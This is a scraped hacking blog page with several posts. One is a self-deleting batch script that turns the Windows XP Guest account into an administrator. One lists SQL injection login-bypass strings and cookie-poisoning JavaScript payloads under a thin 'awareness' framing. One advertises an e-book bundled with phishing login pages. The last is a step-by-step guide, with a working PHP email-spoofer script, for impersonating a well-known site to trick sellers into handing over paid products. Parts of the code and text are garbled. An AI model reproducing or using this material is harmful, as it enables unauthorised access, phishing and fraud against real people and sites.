Design your theme

Convert Guest to admin in windows Xp Computer Spy,Creat Free Website































Convert Guest to admin in windows Xp


[Start copying]


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add


net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0


[End copying]


Copy it in NOTEPAD and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...


Note : Make sure that you have Guest profile on

Web Sites Hacking Methods







Gone are the days when website hacking was a sophisticated art. Today any body can access through the Internet and start hacking your website. All that is needed is doing a search on google with keywords like “how to hack website”, “hack into a website”, “Hacking a website” etc. The following article is not an effort to teach you website hacking, but it has more to do with raising awareness on somecommon website hacking methods.


The Simple SQL Injection Hack
SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.
When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command. This command checks the data you've entered against the relevant table in the database. If your input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.
In its simplest form, this is how the SQL Injection works. It's impossible to explain this without reverting to code for just a moment. Don't worry, it will all be over soon.
Suppose we enter the following string in a User name field:
' OR 1=1 
The authorization SQL query that is run by the server, the command which must be satisfied to allow access, will be something along the lines of:
SELECT * FROM users WHERE username = ‘USRTEXT '
AND password = ‘PASSTEXT
…where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form.
So entering `OR 1=1 — as your username, could result in the following actually being run:
SELECT * FROM users WHERE username = ‘' OR 1=1 — 'AND password = '’
Two things you need to know about this:
['] closes the [user-name] text field.
'double-dash-txt.png' is the SQL convention for Commenting code, and everything after Comment is ignored. So the actual routine now becomes:
SELECT * FROM users WHERE user name = '' OR 1=1
1 is always equal to 1, last time I checked. So the authorization routine is now validated, and we are ushered in the front door to wreck havoc.
Let's hope you got the gist of that, and move briskly on.
Brilliant! I'm gonna go hack me a Bank!
Slow down, cowboy. This half-cooked method won't beat the systems they have in place up at Citibank,
evidently

But the process does serve to illustrate just what SQL Injection is all about — injecting code to manipulate a routine via a form, or indeed via the URL. In terms of login bypass via Injection, the hoary old ' OR 1=1 is just one option. If a hacker thinks a site is vulnerable, there are cheat-sheets all over the web for login strings which can gain access to weak systems. Here are a couple more common strings which are used to dupe SQL validation routines:
username field examples:

  • admin'—
  • ') or ('a'='a
  • ”) or (“a”=”a
  • hi” or “a”=”a
… and so on.

Cross site scripting ( XSS ):
Cross-site scripting or XSS is a threat to a website's security. It is the most common and popular hacking a website to gain access information from a user on a website. There are hackers with malicious objectives that utilize this to attack certain websites on the Internet. But mostly good hackers do this to find security holes for websites and help them find solutions. Cross-site scripting is a security loophole on a website that is hard to detect and stop, making the site vulnerable to attacks from malicious hackers. This security threat leaves the site and its users open to identity theft, financial theft and data theft. It would be advantageous for website owners to understand how cross-site scripting works and how it can affect them and their users so they could place the necessary security systems to block cross-site scripting on their website.

Denial of service ( Ddos attack ):
A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.this is not actually hacking a website but it is used to take down a website.
If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking .

Cookie Poisoning:
Well, for a starters i can begin with saying that Cookie Poisoning is alot like SQL Injection
Both have 'OR'1'='1 or maybe '1'='1'
But in cookie poisoning you begin with alerting your cookies
Javascript:alert(document.cookie)
Then you will perharps see "username=JohnDoe" and "password=iloveJaneDoe"
in this case the cookie poisoning could be:
Javascript:void(document.cookie="username='OR'1'='1"); void(document.cookie="password='OR'1'='1");
It is also many versions of this kind... like for example
'
'1'='1'
'OR'1'='1
'OR'1'='1'OR'
and so on...
You may have to try 13 things before you get it completely right...

Password Cracking
Hashed strings can often be deciphered through 'brute forcing'. Bad news, eh? Yes, and particularly if your encrypted passwords/usernames are floating around in an unprotected file somewhere, and some Google hacker comes across it.
You might think that just because your password now looks something like XWE42GH64223JHTF6533H in one of those files, it means that it can't be cracked? Wrong. Tools are freely available which will decipher a certain proportion of hashed and similarly encoded passwords.

A Few Defensive Measures
* If you utilize a web content management system, subscribe to the development blog. Update to new versions soon as possible.
* Update all 3rd party modules as a matter of course — any modules incorporating web formsor enabling member file uploads are a potential threat. Module vulnerabilities can offer access to your full database.
* Harden your Web CMS or publishing platform. For example, if you use WordPress, use this guide as a reference.
* If you have an admin login page for your custom built CMS, why not call it 'Flowers.php' or something, instead of “AdminLogin.php” etc.?
* Enter some confusing data into your login fields like the sample Injection strings shown above, and any else which you think might confuse the server. If you get an unusual error message disclosing server-generated code then this may betray vulnerability.
* Do a few Google hacks on your name and your website. Just in case…
* When in doubt, pull the yellow cable out! It won't do you any good, but hey, it rhymes.

A Beginner's Guide to Ethical Hacking [E-Book]

A Beginner's Guide to Ethical Hacking [E-Book]


Hacking Guide

Learn What It Takes to Become a Master Hacker

A Beginner’s Guide to Ethical Hacking is a complete path for newbie hackers who  are curious to Learn Ethical Hacking Techniques. The Information given in this book will make you a Master in Hacking.
How will the information in the book affect you?
  • You will learn All Ethical hacking techniques and also you will learn to apply them in real world situation.
  • You will start to think like Hackers.
  • Secure your computer from trojans, worms,  adwares etc.
  • Amaze your friends with your newly learned tricks.
  • You will be able to protect your self from future hack attacks.

Bonus 1

1000 Hacking Tutorials

1000 Hacking Tutorials

For a limited time only , with the purchase of “A Beginner’s Guide to Ethical Hacking” you will receive the following bonus package! 1000 Hacking Tutorials contains 1000 of the best hacking tutorials of 2010 leaked on the internet!

Bonus 2


Set of Phishers
With the purchase of “A Beginner’s Guide to Ethical Hacking” you will also get a set of 30+ Phishers(Fake Login Pages) already created by the Author!

Its Decision Time!

Now you have heard it all so what are you waiting for.
This book does not demand any prior knowledge about Hacking. So if you are a newbie to the concept of hacking and want to master it from the basics, then this book is for you.
The information given in this underground handbook will put you into a hacker’s mindset and teach you all of the hacker’s secret.So what are you waiting for? Grab “A Beginner’s Guide to Ethical hacking” and start your Hacking Journey.

Regular Price $67.00 Today’s Price $20.00

FILED UNDER: CRACK WIFI, DOWNLOADS, EXPLOITS, FACEBOOK HACKS, HACK MSN/HOTMAIL, HACK USING KEYLOGGERS,HACKING, HACKING SOFTWARE, HACKING TOOLS, HACKS, HOW TO, PENETRATION TESTING, PROXIES, SQL INJECTION, TOOLS,TUTORIALS, VIRUS CREATION, WEBSITE HACKING, GOOGLE HACKING, HACK COMPUTER, HACK FACEBOOK, HACK GMAILTAGGED WITH: A BEGINNER'S GUIDE TO ETHICAL HACKING, ETHICAL HACKING, HACKING BOOK, HACKING EBOOK, HACKING GUIDE, HACKING TUTORIALS, LEARN HACKING, LEARN HOW TO HACK

How to get free stuff on the Internet via Social Engineering Computer Spy,Creat Free Website



freeEverybody loves free stuff. But is it possible to get non-free items free on the internet? Of Course! Through Social Engineering and E-Mail Spoofing you can, and I will show you how with an example to back me up. By reading the rest of this post you are agreeing to our DISCLAIMER. Doing this is Illegal, so don’t do it. It’s just an interesting scenario to read about.


First I will show you the process step-by-step, then I will post my real life example that successfully worked out for me.

  1. Find a website selling a digital product(s) online.
  2. Find the website’s main E-Mail address, product creators name and write them down.
  3. Locate a well-known high-ranking website that is based on the niche of the product.
  4. On this website, find their main E-Mail address. Must be a “@that-sites-name.com” E-Mail. If they have multiple go for the one that has to do with advertising or partnerships. Along with the E-Mail address, get the site owner’s name or the name of whoever takes care of advertising and partnerships. Write them down.
  5. Create a new E-Mail address (Gmail) with the popular sites owner’s name in it. This will be used as the site owner’s personal E-Mail. Or so they think.
  6. Now it’s time to write up a believable E-Mail. In the E-Mail, talk about how your company/website (the popular one you chose) is looking to make partnerships and affiliate with products like theirs (the item you want to receive). Then state that before you would like to continue with the partnership, you would like to get a copy of the product to review it to decide whether you would like to continue with the partnership. If the website you are pretending to be is a large and well known, the product owner will realize that he/she could make a lot of money with you, and will send you a copy of the product without hesitation. (See example below)
  7. Now it’s time to send the E-Mail. We will be using the PHP script I wrote below to spoof the E-Mail and make it look like it came from a trusted source (the popular website).
  8. I would highly suggest running the script off your own computer using Wamp (Windows) or Mamp (Mac) with an SMTP server. If you don’t know how to do this, sign up for the E-mail list on the right and you can see a video on it. If your ISP doesn’t allow you send your own E-Mails, then upload it to a webserver that supports PHP and the PHP mail() function. If you decide to use a online hosting service, there will be a higher chance that the E-Mail sent will be flagged as spam.
  9. Run this script and you should see the following form: http://www.MrCracker.com/form/mail.php Don’t try to use it. It’s disabled.
  10. Fill in the spoofed E-Mail. This is the E-Mail of the E-Mail you are spoofing, in other words, the E-Mail that you are impersonating. (The popular site’s E-Mail)
  11. Fill in the target’s E-Mail, the product owner’s E-Mail.
  12. Fill in the reply E-Mail. This is the E-Mail that you created to be used as the site owner’s E-mail. When the target hits reply, the E-Mail will be sent to this E-mail.
  13. Keep the message title short.
  14. Now fill in the actual message. Make sure to format the message with HTML otherwise it’ll be sent without line spaces. To add a line break use the HTML command <br />.
  15. Before you send the E-Mail, first send it to your own E-Mail to see how it looks like. Once everything is correct, you can send it off to the actual product owner.
  16. Now wait, and hopefully you will get a reply with a download link or attachment.


The E-Mail spoofer PHP script:
view sourceprint?
001.<?php
002./*
003. 
004.E-Mail Spoofer
005.MrCracker.com
006. 
007.*/
008. 
009.if($_POST['submit']){ //if submit is hit continue...
010. 
011.$spoof = (stripslashes(trim($_POST['spoof']))); //sanitizes all the user input.
012.$target = (stripslashes(trim($_POST['target'])));
013.$reply =  (stripslashes(trim($_POST['reply'])));
014.$title str_replace(array("\n""\r"), '',stripslashes(trim($_POST['title'])));
015.$body  = (stripslashes(trim($_POST['body'])));
016. 
017.$headers  "From: $spoof\r\n";
018.$headers .= "Reply-To: $reply\r\n";
019.$headers .= 'MIME-Version: 1.0' "\n";
020.$headers .= 'Content-type: text/html; charset=iso-8859-1' "\r\n";
021. 
022.$regex="/^[a-zA-Z][\w \.\-]+[a-zA-Z0-9]@([a-zA-Z0-9][a-zA-Z0-9\-]*\.)+[a-zA-Z]{2,4}$/"//Compares input email to this pattern to make sure it is a valid email.
023.if($spoof == "" || !preg_match($regex$spoof)){
024. 
025.echo "<font color='red'><b> Error: No Spoof Email Provided or Email Invalid!
026.</font></b>"; //error checking
027.exit;
028.}
029.elseif($target == "" || !preg_match($regex$target)){
030.echo "<font color='red'><b> Error: No Target Email Provided or Email Invalid!
031.</font></b>";
032.exit;
033.}
034.elseif($reply == ""){
035.echo "<font color='red'><b> Error: No Reply Email Provided! </font></b>";
036.exit;
037.}
038.elseif($title == ""){
039.echo "<font color='red'><b> Error: No Email Title Provided! </font></b>";
040.exit;
041.}
042.elseif($body == ""){
043.echo "<font color='red'><b> Error: No Email Body Provided! </font></b>";
044.exit;
045.}
046.else{
047.mail($target$title$body$headers); //if there are no errors, send the email
048.echo "Mail Was Sent!";
049.}
050.}
051.else//if submit wasn't hit, show the HTML form
052.?>
053.<!-- This is the CSS which makes the form look the way it does. -->
054.<html>
055.<body>
056.<style type="text/css">
057.body {
058.font-family: Arial;
059.font-size: .9em;
060.}
061.input {
062.background: #ECFDCE;
063.border: 1px solid green;
064.}
065.textarea {
066.background: #ECFDCE;
067.border: 1px solid green;
068.}
069.legend {
070.border: 1px solid #048DB4;
071.background: #F0F8FF;
072.}
073. 
074.fieldset {
075.border: 1px solid #048DB4;
076.width: 18.7em;
077.padding-left: 11px;
078.padding-bottom: 20px;
079.background: #F0F8FF;
080.}
081.<!-- This is the HTML form -->
082.</style>
083.<fieldset>
084.<legend>Email Spoofer</legend>
085.<form action="" method="POST">
086.Spoofed Email:<br>
087.<input type="text" size="40" name="spoof"><br>
088.Targets Email:<br>
089.<input type="text" size="40" name="target"><br>
090.Reply Email:<br>
091.<input type="text" size="40" name="reply"><br>
092.Message Title:<br>
093.<input type="text"size="40" name="title"><br>
094.Message Body:<br>
095.<textarea rows="10" cols="30" name="body">
096.</textarea><br>
097.<input type="submit" value="Submit" name="submit">
098.<input type="reset" value="Clear">
099.</form>
100.</fieldset>
101.</body>
102.</html>
103.<?php
104.}
105.?>
106.</pre>


In the example, I will show you how I used this on someone I know to see if it worked. As you will see, I will not be naming the specific websites or people.


Spoofed Email: advertising@big-sample-site.com


Target Email: Name@product-site.com


Reply To: Site-Big-Owners-Name@Gmail.com


Message Title: Product Name Partnership


Message Body: Hello Product-Owner-Name,


Big-Sample-Site.com is looking to make some new affiliations to raise funding and your “Product Name” has caught our attention. We only consider serious and professional products. Before we consider anything else, would you be willing to send us a copy of your product so that we may review it and decide whether we would still like to pursue this partnership.<br /><br />


If you are interested, please reply to this E-Mail as soon as possible. <br /><br />


-Name <br />
Big-Sample-Website.com <br />


Notice how I added <br /> into the message. This is important so that line breaks are created. If they aren’t added, the whole message will be received in one giant paragraph and won’t look professional.


The next day, I had the product in my E-Mail, and I notified my friend about this kind of attack.


Note: This is a shot or miss thing. Some people will get suspicious and send the actual product to the original E-Mail isntead of the changed reply E-Mail address. Sometimes people will fall for regular free E-Mail address. If you use a free E-Mail address, you won’t have to spoof the E-Mail and risk have it sent to spam, or having the target reply to the wrong E-Mail, so that’s also worth a try.



Total Pageviews

Recent Comments

Recent Posts